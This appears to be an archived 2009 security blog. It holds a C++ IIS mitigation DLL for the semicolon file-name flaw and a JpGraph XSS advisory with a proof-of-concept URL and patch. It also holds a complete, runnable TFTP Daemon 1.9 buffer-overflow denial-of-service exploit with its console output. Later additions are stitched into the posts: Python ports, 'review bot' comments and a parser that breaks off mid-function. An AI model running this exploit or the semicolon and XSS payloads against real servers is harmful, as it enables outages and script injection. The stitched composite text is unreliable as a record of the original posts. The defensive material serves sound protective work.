/*
This mitigation should help block attempts to exploit the IIS
semicolon zero-day (BID 37460), but no warranties and no guarantees.
It didn't crash my web servers during testing, but I make no
representations as to how it will or won't perform on anyone else's
web servers. This mitigation is only intended for IIS 4.0, 5.x, and
6.0; IIS 7.0 does not appear to be vulnerable (although in my
testing, IIS 4.0, 5.0, and 5.1 didn't appear to be vulnerable,
either), and 7.5 is also reportedly not vulnerable.
If an attack is blocked, it should show up in the IIS logs with HTTP
status 403 and the made-up substatus 59; for example, on IIS 6.0:
2009-12-27 12:34:56 W3SVC1 169.254.123.200 GET /evil.asp;x.jpg
- 80 - 169.254.123.100 Mozilla/4.0+(compatible;+MSIE+...) 403 59 0
When passed a malformed file name by IIS due to the vulnerability,
most (non-.NET) ISAPI extensions will process the file, including:
asp.dll / asp51.dll: .asa, .asp, .cdx, .cer, .htr
httpodbc.dll: .idc
ssinc.dll: .shtm, .shtml, .stm
So to get the most protection, you'll need to remap the file
extensions for each different ISAPI extension to a different copy of
the mitigation DLL -- it uses the file name with which it loads to
figure out which ISAPI extension it's wrapping. You'll also need to
set up the registry to tell it where to find the ISAPI extension it's
replacing. For example:
[HKEY_LOCAL_MACHINE\SOFTWARE\iissemi1]
"iissemi1_asp.dll" = "C:\WINDOWS\system32\inetsrv\asp.dll"
"iissemi1_ssinc.dll" = "C:\WINDOWS\system32\inetsrv\ssinc.dll"
Try out a malformed file name after deploying to make sure you have
everything set up properly.
Sorry I can't host an installer right now to automate all of this.
Hopefully most people won't need to use this mitigation, but if the
other options for reducing exposure aren't viable in your situation,
I hope this one will be.
-- Derek
P.S. The vulnerability can also be exploited if a subdirectory
containing ".xxx;" can be created; for instance, accessing
"/~y.asp;y/z.jpg" would cause "z.jpg" to be executed by the
ASP ISAPI extension as though it were an ASP script.
*/
////////////////////////////////////////////////////////////////
// iissemi1.cpp
//==============================================================
// Mitigation to prevent processing of file names that contain a
// semicolon or aberrant colon, to guard against the IIS
// semicolon zero-day.
//
// All file extensions that would normally execute an ISAPI
// extension must be manually remapped to a copy of the
// mitigation DLL. The mitigation works by passing requests to
// the original ISAPI extension unless they contain a semicolon
// or improper colon. It is hard-coded to track down asp.dll
// and a few other DLLs, if the mitigation DLL itself loads with
// a file name that indicates which ISAPI extension it's
// replacing; to override this default behavior, or to support
// an unrecognized ISAPI extension, add a registry value
// matching the mitigation DLL's file name in the
// "HKEY_LOCAL_MACHINE\SOFTWARE\iissemi1" registry key.
//
// To build:
//
// 1. Start Visual Studio 2008 (2005 should also work)
// 2. File -> New -> Project
// 3. Choose Visual C++: Win32: Win32 Project
// 4. Enter "iissemi1" for the name
// 5. In the Win32 Application Wizard, choose an
// "Application type" of "DLL", and under "Additional
// options", check "Empty project"
// 6. In the Solution Explorer, right-click on "Source Files",
// Add -> New Item
// 7. Choose "C++ File (.cpp)" and enter "iissemi1.cpp" for
// the name
// 8. Paste all of this source code into the new .cpp file
// 9. In the Solution Explorer, right-click again on "Source
// Files", Add -> New Item
// 10. Choose "Module-Definition File (.def)" and enter
// "iissemi1.def" for the name
// 11. Paste everything in the block comment below (between the
// rows of ****'s) into the new .def file
// 12. Build -> Configuration Manager; for "Active solution
// configuration", choose "Release"
// 13. For maximum portability, Project -> Properties,
// Configuration Properties: C/C++: Code Generation: set
// "Runtime Library" to "Multi-threaded (/MT)"; this will
// keep iissemi1.dll from requiring MSVCR*.DLL
// 14. (While you're in there, Project -> Properties,
// Configuration Properties: Linker: Input, and make sure
// that "Module Definition File" contains "iissemi1.def")
// 15. Build -> Build Solution
//
// To use:
//
// 16. Open Internet Information Services Manager MMC snap-in
// (run "inetmgr")
// 17. Right-click on "Web Sites" or machine node, Properties
// (Master Properties: Edit, as applicable)
// 18. Home Directory tab, Configuration
// 19. Copy iissemi1.dll to a different file name for each
// distinct ISAPI extension you need to replace; e.g.,
// "iissemi1_asp.dll" if you need to replace "asp.dll",
// "iissemi1_httpodbc.dll" for "httpodbc.dll", etc.
// 20. Remap the file extensions for every ISAPI extension which
// you wouldn't want users to be able to supply with
// arbitrary files, to instead use a copy of iissemi1.dll.
// Make sure to keep a record of each mapping changed, so
// that you can easily reverse the changes later.
// (Note that you might get "requested resource is in use"
// errors if you don't remap every file extension belonging
// to an ISAPI extension -- e.g., if you remap ".asp" but
// not ".asa", you might get HTTP 500 errors when you
// access an ASA file.)
// 21. IIS 6.0: In the IIS Manager, go to the "Web Service
// Extensions" folder, Action -> Add a new web service
// extension, enter "iissemi1" for the extension name, add
// each file created in Step 19 to the "Required files"
// list, check "Set extension status to Allowed", OK
// 22. In Regedit, create the registry key
// "HKEY_LOCAL_MACHINE\SOFTWARE\iissemi1"
// 23. In this new key, create string (REG_SZ or REG_EXPAND_SZ)
// registry values named after the copies of iissemi1.dll
// created in Step 19. The data of each registry value
// should be the full path and file name of the ISAPI
// extension that was replaced; e.g., set the value named
// "iissemi1_asp.dll" to
// "C:\WINDOWS\system32\inetsrv\asp.dll", set the value named
// "iissemi1_httpodbc.dll" to
// "C:\WINDOWS\system32\inetsrv\httpodbc.dll", etc.
// 24. Restart W3SVC (run "iisreset")
//
// To uninstall, remap the file extension mappings changed in
// Step 20 back to their original executable paths.
//
// NO WARRANTIES. Use at your own risk. Redistribution of this
// source code in its original, unmodified form is permitted.
//
// Copyright (C) Derek Soeder - 12/27/2009
////////////////////////////////////////////////////////////////
/**** Paste the following into a new .def file: *************
LIBRARY "iissemi1.dll"
EXPORTS
AspStatusHtmlDump
DllCanUnloadNow PRIVATE
DllGetClassObject PRIVATE
DllRegisterServer PRIVATE
DllUnregisterServer PRIVATE
GetExtensionVersion
HttpExtensionProc
TerminateExtension
***************************************************************/
#define WIN32_LEAN_AND_MEAN
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>   // LoadLibraryW, GetProcAddress, registry and critical-section APIs
#include <objbase.h>   // STDAPI, LPFNCANUNLOADNOW, LPFNGETCLASSOBJECT (not pulled in under WIN32_LEAN_AND_MEAN)
#include <httpext.h>   // EXTENSION_CONTROL_BLOCK, HSE_VERSION_INFO, HSE_* constants and callback types
#include <string.h>    // wcslen, _wcsnicmp, wcscat, wcsrchr, strchr, memcpy
////////////////////////////////////////////////////////////////
// Original ISAPI wrapper
////////////////////////////////////////////////////////////////
WCHAR g_wszMyself[1024];
CRITICAL_SECTION g_csWrappers;
HMODULE g_hmISAPI;
WCHAR g_wszISAPI[1024];
typedef BOOL (WINAPI * PFNASPSTATUSHTMLDUMP)( PVOID, PVOID );
typedef HRESULT (STDAPICALLTYPE * PFNDLLREGISTERSERVER)();
typedef HRESULT (STDAPICALLTYPE * PFNDLLUNREGISTERSERVER)();
PFNASPSTATUSHTMLDUMP g_pfnAspStatusHtmlDump;
LPFNCANUNLOADNOW g_pfnDllCanUnloadNow;
LPFNGETCLASSOBJECT g_pfnDllGetClassObject;
PFNDLLREGISTERSERVER g_pfnDllRegisterServer;
PFNDLLUNREGISTERSERVER g_pfnDllUnregisterServer;
PFN_GETEXTENSIONVERSION g_pfnGetExtensionVersion;
PFN_HTTPEXTENSIONPROC g_pfnHttpExtensionProc;
PFN_TERMINATEEXTENSION g_pfnTerminateExtension;
const struct { void * ppfn; const char * sz; } LOOKUP[] =
{
{ &g_pfnAspStatusHtmlDump, "AspStatusHtmlDump" },
{ &g_pfnDllCanUnloadNow, "DllCanUnloadNow" },
{ &g_pfnDllGetClassObject, "DllGetClassObject" },
{ &g_pfnDllRegisterServer, "DllRegisterServer" },
{ &g_pfnDllUnregisterServer, "DllUnregisterServer" },
{ &g_pfnGetExtensionVersion, "GetExtensionVersion" },
{ &g_pfnHttpExtensionProc, "HttpExtensionProc" },
{ &g_pfnTerminateExtension, "TerminateExtension" }
} ;
BOOL read_reg_path(
LPCWSTR wszKeyName,
LPCWSTR wszValueName )
{
HKEY hkey;
DWORD dwtype, cb, cwch;
WCHAR wsz[ sizeof(g_wszISAPI) /
sizeof(g_wszISAPI[0]) ];
if ( RegOpenKeyExW( HKEY_LOCAL_MACHINE, wszKeyName, 0,
KEY_READ, &hkey ) != ERROR_SUCCESS )
{
return FALSE;
}
cb = (sizeof(g_wszISAPI) - sizeof(g_wszISAPI[0]));
if (RegQueryValueExW( hkey, wszValueName, NULL, &dwtype,
(LPBYTE)g_wszISAPI, &cb ) != ERROR_SUCCESS ||
cb < sizeof(g_wszISAPI[0]) ||
cb > (sizeof(g_wszISAPI) - sizeof(g_wszISAPI[0])) )
{
RegCloseKey( hkey );
return FALSE;
}
RegCloseKey( hkey );
g_wszISAPI[cb / sizeof(g_wszISAPI[0])] = L'\0';
if (dwtype == REG_EXPAND_SZ)
{
cwch = ExpandEnvironmentStringsW( g_wszISAPI,
wsz, ((sizeof(wsz) / sizeof(wsz[0])) - 1) );
if ( cwch == 0 ||
cwch >= (sizeof(wsz) / sizeof(wsz[0])) - 1)
{
return FALSE;
}
wsz[cwch] = L'\0';
memcpy( g_wszISAPI,
wsz, ((cwch + 1) * sizeof(g_wszISAPI[0])) );
}
else if (dwtype != REG_SZ)
return FALSE;
return TRUE;
} //read_reg_path
const wchar_t * __wcsstri(
const wchar_t * _Str,
const wchar_t * _SubStr )
{
size_t cwchstr, cwchsub;
cwchstr = wcslen( _Str );
cwchsub = wcslen( _SubStr );
if (cwchstr < cwchsub)
return 0;
for (cwchstr -= cwchsub; ; cwchstr--, _Str++)
{
if (_wcsnicmp( _Str, _SubStr, cwchsub ) == 0)
return _Str;
if (cwchstr == 0) break;
}
return 0;
} //__wcsstri
BOOL try_defaults(
LPCWSTR wszMyFileName )
{
LPCWSTR wszdll;
if (__wcsstri( wszMyFileName, L"asp51" ))
{
if ( read_reg_path( L"SOFTWARE\\Classes\\CLSID\\"
L"{D97A6DA0-A861-11cf-93AE-00A0C90C2BD8}\\"
L"InprocServer32", NULL ) )
{
return TRUE;
}
wszdll = L"\\asp51.dll";
}
else if (__wcsstri( wszMyFileName, L"asp" ))
{
if ( read_reg_path( L"SOFTWARE\\Classes\\CLSID\\"
L"{D97A6DA0-A861-11cf-93AE-00A0C90C2BD8}\\"
L"InprocServer32", NULL ) )
{
return TRUE;
}
wszdll = L"\\asp.dll";
}
else if (__wcsstri( wszMyFileName, L"httpodbc" ))
wszdll = L"\\httpodbc.dll";
else if (__wcsstri( wszMyFileName, L"ssinc" ))
wszdll = L"\\ssinc.dll";
else if (__wcsstri( wszMyFileName, L"urlauth" ))
wszdll = L"\\urlauth.dll";
else if (__wcsstri( wszMyFileName, L"w3isapi" ))
wszdll = L"\\w3isapi.dll";
else return FALSE;
if ( read_reg_path( L"SOFTWARE\\Microsoft\\InetStp",
L"InstallPath" ) &&
( (sizeof(g_wszISAPI) / sizeof(g_wszISAPI[0])) -
wcslen( g_wszISAPI ) ) > (wcslen( wszdll ) + 1) )
{
wcscat( g_wszISAPI, wszdll );
return TRUE;
}
g_wszISAPI[0] = L'\0';
return FALSE;
} //try_defaults
BOOL load_isapi()
{
LPCWSTR wcp;
size_t i;
EnterCriticalSection( &g_csWrappers );
__try
{
if (g_hmISAPI != NULL)
return TRUE;
wcp = wcsrchr( g_wszMyself, L'\\' );
if (wcp) wcp++; else wcp = g_wszMyself;
if (!read_reg_path( L"SOFTWARE\\iissemi1", wcp ))
{
if (!try_defaults( wcp ))
return FALSE;
}
g_hmISAPI = LoadLibraryW( g_wszISAPI );
if (g_hmISAPI == NULL) return FALSE;
for ( i = 0;
i < (sizeof(LOOKUP) / sizeof(LOOKUP[0])); i++ )
{
*(void * *)(LOOKUP[i].ppfn) =
(void *)GetProcAddress(
g_hmISAPI, LOOKUP[i].sz );
}
}
__finally
{
LeaveCriticalSection( &g_csWrappers );
}
return TRUE;
} //load_isapi
////////////////////////////////////////////////////////////////
// ISAPI extension replacement exports
////////////////////////////////////////////////////////////////
BOOL WINAPI AspStatusHtmlDump(
PVOID pArg0,
PVOID pArg1 )
{
if (!load_isapi() || g_pfnAspStatusHtmlDump == NULL)
return FALSE;
return g_pfnAspStatusHtmlDump( pArg0, pArg1 );
} //AspStatusHtmlDump
STDAPI DllCanUnloadNow()
{
if (!load_isapi() || g_pfnDllCanUnloadNow == NULL)
return S_OK;
return g_pfnDllCanUnloadNow();
} //DllCanUnloadNow
STDAPI DllGetClassObject(
REFCLSID rclsid,
REFIID riid,
LPVOID * ppv )
{
if (!load_isapi() || g_pfnDllGetClassObject == NULL)
return E_UNEXPECTED;
return g_pfnDllGetClassObject( rclsid, riid, ppv );
} //DllGetClassObject
STDAPI DllRegisterServer()
{
if (!load_isapi() || g_pfnDllRegisterServer == NULL)
return E_UNEXPECTED;
return g_pfnDllRegisterServer();
} //DllRegisterServer
STDAPI DllUnregisterServer()
{
if (!load_isapi() || g_pfnDllUnregisterServer == NULL)
return E_UNEXPECTED;
return g_pfnDllUnregisterServer();
} //DllUnregisterServer
BOOL WINAPI GetExtensionVersion(
HSE_VERSION_INFO * pVer )
{
if (!load_isapi() || g_pfnGetExtensionVersion == NULL)
return FALSE;
return g_pfnGetExtensionVersion( pVer );
} //GetExtensionVersion
DWORD WINAPI HttpExtensionProc(
EXTENSION_CONTROL_BLOCK * pECB )
{
HSE_CUSTOM_ERROR_INFO hseerr;
BOOL fdanger;
const char * cp;
if (!load_isapi() || g_pfnHttpExtensionProc == NULL)
return HSE_STATUS_ERROR;
if (pECB != NULL && pECB->lpszPathTranslated != NULL)
{
fdanger = FALSE;
if (strchr( pECB->lpszPathTranslated, ';' ))
fdanger = TRUE;
#if 1 // also check for colon that doesn't belong
cp = pECB->lpszPathTranslated;
if ( cp[0] == '\\' && cp[1] == '\\' &&
(cp[2] == '.' || cp[2] == '?') &&
cp[3] == '\\' && cp[4] != '\0' && cp[5] == ':' )
{
cp += 6;
}
else if ( cp[0] == '\\' && cp[1] == '?' &&
cp[2] == '?' && cp[3] == '\\' &&
cp[4] != '\0' && cp[5] == ':' )
{
cp += 6;
}
else if (cp[0] != '\0' && cp[1] == ':')
{
cp += 2;
}
if (strchr( cp, ':' ))
fdanger = TRUE;
#endif
if (fdanger)
{
if (pECB->ServerSupportFunction != NULL)
{
pECB->ServerSupportFunction(
pECB->ConnID,
HSE_REQ_SEND_RESPONSE_HEADER,
"403 Forbidden",
NULL, NULL );
hseerr.pszStatus = "403 Forbidden";
hseerr.uHttpSubError = 59;
hseerr.fAsync = FALSE; // send the custom error synchronously; leave no field of hseerr uninitialized
pECB->ServerSupportFunction(
pECB->ConnID,
HSE_REQ_SEND_CUSTOM_ERROR,
&hseerr, NULL, NULL );
} //if(pECB->ServerSupportFunction)
pECB->dwHttpStatusCode = 403;
return HSE_STATUS_SUCCESS;
} //if(fdanger)
} //if(pECB&&pECB->lpszPathTranslated)
return g_pfnHttpExtensionProc( pECB );
} //HttpExtensionProc
BOOL WINAPI TerminateExtension(
DWORD dwFlags )
{
if (!load_isapi() || g_pfnTerminateExtension == NULL)
return FALSE;
return g_pfnTerminateExtension( dwFlags );
} //TerminateExtension
////////////////////////////////////////////////////////////////
// DLL initialization
////////////////////////////////////////////////////////////////
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved )
{
DWORD cwch;
if (fdwReason == DLL_PROCESS_ATTACH)
{
cwch = GetModuleFileNameW( hinstDLL, g_wszMyself,
( ( sizeof(g_wszMyself) /
sizeof(g_wszMyself[0]) ) - 1 ) );
if ( cwch == 0 ||
cwch >= ( ( sizeof(g_wszMyself) /
sizeof(g_wszMyself[0]) ) - 1 ) )
{
return FALSE;
}
InitializeCriticalSection( &g_csWrappers );
g_hmISAPI = NULL;
g_wszISAPI[0] = L'\0';
}
else if (fdwReason == DLL_PROCESS_DETACH)
{
// do this in TerminateExtension?
//if (g_hmISAPI != NULL)
//{
// FreeLibrary( g_hmISAPI );
// g_hmISAPI = NULL;
//}
DeleteCriticalSection( &g_csWrappers );
}
return TRUE;
} //DllMain
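A defender-side companion to the wrapper above, added here and not part of Derek's post: a Python port of the lpszPathTranslated test that HttpExtensionProc performs (a semicolon anywhere, or a colon anywhere past the drive letter or device prefix), plus a scanner over IIS 6.0 W3C log lines that picks out requests the mitigation answered with 403.59 and, for servers that never had the mitigation, any request whose URI stem carries a semicolon. The log rows, the #Fields header and the User-Agent string are constructed for this example.

```python
# Added example (not from the original post): Python port of the iissemi1
# path check, plus a W3C log scanner for the 403.59 block signature.

# Constructed sample in IIS 6.0 W3C Extended format; the #Fields line names
# the default field set so the scanner can address columns by name.
W3C_SAMPLE = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-12-27 12:34:56 W3SVC1 169.254.123.200 GET /evil.asp;x.jpg - 80 - 169.254.123.100 Mozilla/4.0+(compatible;+MSIE+6.0) 403 59 0
2009-12-27 12:35:01 W3SVC1 169.254.123.200 GET /index.asp - 80 - 169.254.123.100 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2009-12-27 12:35:09 W3SVC1 169.254.123.200 GET /~y.asp;y/z.jpg - 80 - 169.254.123.100 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
"""


def strip_drive_prefix(path):
    r"""Drop the one place a colon legitimately appears in a translated path:
    right after the drive letter, either plain ('C:') or behind one of the
    \\?\ , \\.\ and \??\ device prefixes that the C++ code special-cases."""
    if (len(path) >= 6 and path[:2] == '\\\\' and path[2] in '.?'
            and path[3] == '\\' and path[5] == ':'):
        return path[6:]
    if len(path) >= 6 and path[:4] == '\\??\\' and path[5] == ':':
        return path[6:]
    if len(path) >= 2 and path[1] == ':':
        return path[2:]
    return path


def path_is_dangerous(path_translated):
    """True when the wrapper would answer 403.59 instead of forwarding."""
    if ';' in path_translated:
        return True
    return ':' in strip_drive_prefix(path_translated)


def scan_iis_log(text):
    """Return (timestamp, client ip, uri stem, reasons) for suspicious rows."""
    fields, hits = None, []
    for line in text.splitlines():
        if line.startswith('#Fields:'):
            fields = line.split()[1:]
            continue
        if not line or line.startswith('#') or fields is None:
            continue
        cols = line.split(' ')          # IIS writes spaces inside fields as '+'
        if len(cols) != len(fields):
            continue                    # skip rows that do not match the header
        rec = dict(zip(fields, cols))
        reasons = []
        if rec['sc-status'] == '403' and rec['sc-substatus'] == '59':
            reasons.append('blocked by mitigation (403.59)')
        if ';' in rec['cs-uri-stem']:
            reasons.append('semicolon in cs-uri-stem')
        if reasons:
            hits.append((rec['date'] + ' ' + rec['time'], rec['c-ip'],
                         rec['cs-uri-stem'], reasons))
    return hits


if __name__ == '__main__':
    for sample in (r'C:\Inetpub\wwwroot\evil.asp;x.jpg',
                   r'C:\Inetpub\wwwroot\~y.asp;y\z.jpg',
                   r'\\?\C:\Inetpub\wwwroot\ok.asp'):
        print('%-40s %s' % (sample, path_is_dangerous(sample)))
    for hit in scan_iis_log(W3C_SAMPLE):
        print(hit)
```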
Tuesday, December 29, 2009
Code to mitigate IIS semicolon zero-day
Thursday, December 24, 2009
XSS Vulnerability in JpGraph 3.0.6
Discovered by Martin Barbella
Description of Vulnerability:
-----------------------------
JpGraph is an object-oriented PHP library for creating various types of
graphs; it also supports client-side image maps.
The GetURLArguments function of JpGraph's Graph class does not
properly sanitize the names of GET and POST variables, leading to a
cross-site scripting vulnerability.
Systems affected:
-----------------
This has been confirmed in version 3.0.6 of JpGraph's free release.
Previous versions and the professional versions may be affected as well.
Impact:
-------
When a user is tricked into clicking on a malicious link or submitting a
specially crafted form, the injected code travels to the vulnerable web
server, which reflects the attack back to the user’s browser. The
browser then executes the code because it came from a "trusted" server.
(From OWASP: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29)
Mitigating factors:
-------------------
The vulnerability seems to be exploitable only in cases where client
side image maps are used.
Proof of concept:
-----------------
This can be demonstrated with the csim_in_html_ex1.php example provided
with JpGraph (as well as various other csim examples), as shown below.
http://site/csim_in_html_ex1.php?"/>=arbitrary
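To see why a parameter name needs the same treatment as its value, here is an added Python port (not JpGraph's own code) of the two versions of the query-string rebuild in Graph::GetURLArguments, the one the advisory reports and the one its patch installs. The area_tag template is an assumption about the image-map markup the csim examples emit, and quote_plus stands in for PHP's urlencode().

```python
# Added example (not JpGraph's code): vulnerable vs. patched rebuild of the
# '&key=value' string, and a check for characters that end an HTML attribute.
from urllib.parse import quote_plus


def php_urlencode(value):
    """Stand-in for PHP urlencode(): space becomes '+', everything outside
    the unreserved set is %XX-encoded (quote_plus with no 'safe' chars)."""
    return quote_plus(str(value), safe='')


def build_url_args(params, encode_keys):
    """Rebuild the '&key=value' tail the way jpgraph.php does.

    encode_keys=False mirrors the reported code: only values go through
    urlencode(), names are concatenated raw.  encode_keys=True mirrors the
    patched code, which encodes the name and the array index as well."""
    enc_key = php_urlencode if encode_keys else str
    urlarg = ''
    for key, value in params.items():
        if isinstance(value, dict):           # PHP array parameter a[k]=v
            for k, v in value.items():
                urlarg += ('&' + enc_key(key) + '%5B' + enc_key(k) + '%5D='
                           + php_urlencode(v))
        else:
            urlarg += '&' + enc_key(key) + '=' + php_urlencode(value)
    return urlarg


def can_break_attribute(urlarg):
    """Raw quote or angle bracket in the rebuilt arguments means the value
    can close the surrounding attribute (or tag) and start its own markup."""
    return any(ch in urlarg for ch in '"\'<>')


def area_tag(href_base, urlarg):
    """Assumed shape of the client-side image-map entry a csim page writes;
    the rebuilt arguments end up inside the href attribute."""
    return '<area shape="rect" coords="0,0,10,10" href="%s?%s" />' % (
        href_base, urlarg.lstrip('&'))


if __name__ == '__main__':
    # Constructed request: the parameter *name* from the advisory's PoC URL.
    params = {'"/>': 'arbitrary'}
    for encode_keys in (False, True):
        args = build_url_args(params, encode_keys)
        print('encode_keys=%-5s %s' % (encode_keys, area_tag('graph.php', args)))
        print('   breaks out of attribute:', can_break_attribute(args))
```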
Solution:
---------
The following patch can be applied to jpgraph.php to correct the
vulnerability.
--- jpgraph.php.orig 2009-11-14 14:45:01.000000000 -0500
+++ jpgraph.php 2009-11-14 14:55:34.000000000 -0500
@@ -1286,11 +1286,11 @@
while( list($key,$value) = each($_GET) ) {
if( is_array($value) ) {
foreach ( $value as $k => $v ) {
- $urlarg .= '&'.$key.'%5B'.$k.'%5D='.urlencode($v);
+ $urlarg .=
'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);
}
}
else {
- $urlarg .= '&'.$key.'='.urlencode($value);
+ $urlarg .= '&'.urlencode($key).'='.urlencode($value);
}
}
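Review bot: the replacement line in this hunk has been wrapped, so the continuation "'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);" arrives without a leading "+" and patch will reject the hunk (the header still promises 11 new-side lines). Rejoin it onto the "+ $urlarg .=" line before applying, or make the edit by hand; the change itself, passing $key and $k through urlencode() exactly as $v already is, is the right fix for a string that is written into generated HTML.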
@@ -1301,11 +1301,11 @@
while( list($key,$value) = each($_POST) ) {
if( is_array($value) ) {
foreach ( $value as $k => $v ) {
- $urlarg .= '&'.$key.'%5B'.$k.'%5D='.urlencode($v);
+ $urlarg .=
'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);
}
}
else {
- $urlarg .= '&'.$key.'='.urlencode($value);
+ $urlarg .= '&'.urlencode($key).'='.urlencode($value);
}
}
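Review bot: this hunk is the $_GET loop repeated verbatim for $_POST, so the encoding rule now has to be kept correct in two places; moving the "'&'.urlencode($key) ... urlencode($v)" assembly into one small helper called from both loops would keep them from drifting apart the next time either is changed. The same line-wrapping problem as in the first hunk applies here: the continuation of the array-case assignment has no "+" prefix and must be rejoined before the patch is applied.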
Wednesday, December 23, 2009
Remote Buffer Overflow Exploit (TFTP Daemon Version 1.9) by Socket_0x03
//################################################
//
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03@teraexe.com
//Website: www.teraexe.com
//
//################################################
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

/* TFTP request: opcode 0x0002, a 300-byte file name, NUL, the mode string, NUL.
   Each "\x41..." line below is ten 'A' bytes. */
char Buffer_Overflow[] =
"\x00\x02"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\0"
"netascii"
"\0";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    SOCKET mysocket;
    int destPORT = 69;

    if (argc < 2){
        printf("\nVulnerability: Remote Buffer Overflow Exploit\n");
        printf("Impact: Remote Denial of Service Attack\n");
        printf("Vulnerable Application: TFTP Daemon Version 1.9\n");
        printf("\nAuthor: Socket_0x03\n");
        printf("Contact: Socket_0x03@teraexe.com\n");
        printf("Website: www.teraexe.com\n");
        printf("\nUsage: exploit + IP Address\n");
        printf("Example: exploit 192.168.1.100\n");
        return 1;
    }

    /* WSAStartup() returns 0 on success and a positive WSA error code otherwise */
    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) != 0) {
        printf("No winsock suitable version found!");
        return 1;
    }

    mysocket = socket(AF_INET, SOCK_DGRAM, 0);
    if (mysocket == INVALID_SOCKET){
        printf("Error: Cannot create a socket.\n");
        WSACleanup();
        return 1;
    }

    printf("Resolving IP Address.\n");
    if ((pTarget = gethostbyname(argv[1])) == NULL){   /* the host is the first argument */
        printf("Error: Resolve of %s failed.\n", argv[1]);
        closesocket(mysocket);
        WSACleanup();
        return 1;
    }

    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons(destPORT);

    /* connect() on a UDP socket only records the default peer for send() */
    printf("Connecting to Daemon 1.9\n");
    if (connect(mysocket, (struct sockaddr *)&sock, sizeof(sock)) != 0){
        printf("Error: Could not connect to TFTP Daemon\n");
        closesocket(mysocket);
        WSACleanup();
        return 1;
    }
    printf("Connection Completed.\n");
    Sleep(10);

    /* sizeof() counts the string literal's own terminating NUL; send only the packet bytes */
    printf("Sending packet.\n");
    if (send(mysocket, Buffer_Overflow, sizeof(Buffer_Overflow) - 1, 0) == SOCKET_ERROR){
        printf("Error sending packet.\n");
        closesocket(mysocket);
        WSACleanup();
        return 1;
    }
    printf("Remote Buffer Overflow Completed.\n");
    closesocket(mysocket);
    WSACleanup();
    return 0;
}
/*
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>exploit
Vulnerability: Remote Buffer Overflow Exploit
Impact: Remote Denial of Service Attack
Vulnerable Application: TFTP Daemon Version 1.9
Author: Socket_0x03
Contact: Socket_0x03@teraexe.com
Website: www.teraexe.com
Usage: exploit + IP Address
Example: exploit 192.168.1.100
C:\>exploit 192.168.1.101
Resolving IP Address.
Connecting to Daemon 1.9
Connection Completed.
Sending packet.
Remote Buffer Overflow Completed.
C:\>
*/
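Seen from the daemon's side, the request above is a WRQ (opcode 2) whose file-name field runs to 300 bytes before its terminator. An added example, not the exploit author's code: a bounded parser for TFTP read and write requests (RFC 1350 framing) that rejects such a packet instead of copying the name into a fixed buffer; the 255-byte ceiling is an assumption, since the RFC sets none, and both packets are constructed here.

```python
# Added example (not from the original post): length-checked parsing of
# TFTP RRQ/WRQ packets, the request type the exploit above sends.
import struct

RRQ, WRQ = 1, 2
MAX_FILENAME = 255                 # assumption: RFC 1350 gives no limit
MODES = ('netascii', 'octet', 'mail')

# Constructed packets: the shape the exploit above sends, and a benign one.
CRASH_PACKET = b'\x00\x02' + b'A' * 300 + b'\x00netascii\x00'
GOOD_PACKET = b'\x00\x01' + b'boot.cfg' + b'\x00octet\x00'


class TftpError(ValueError):
    pass


def _cstring(buf, limit, what):
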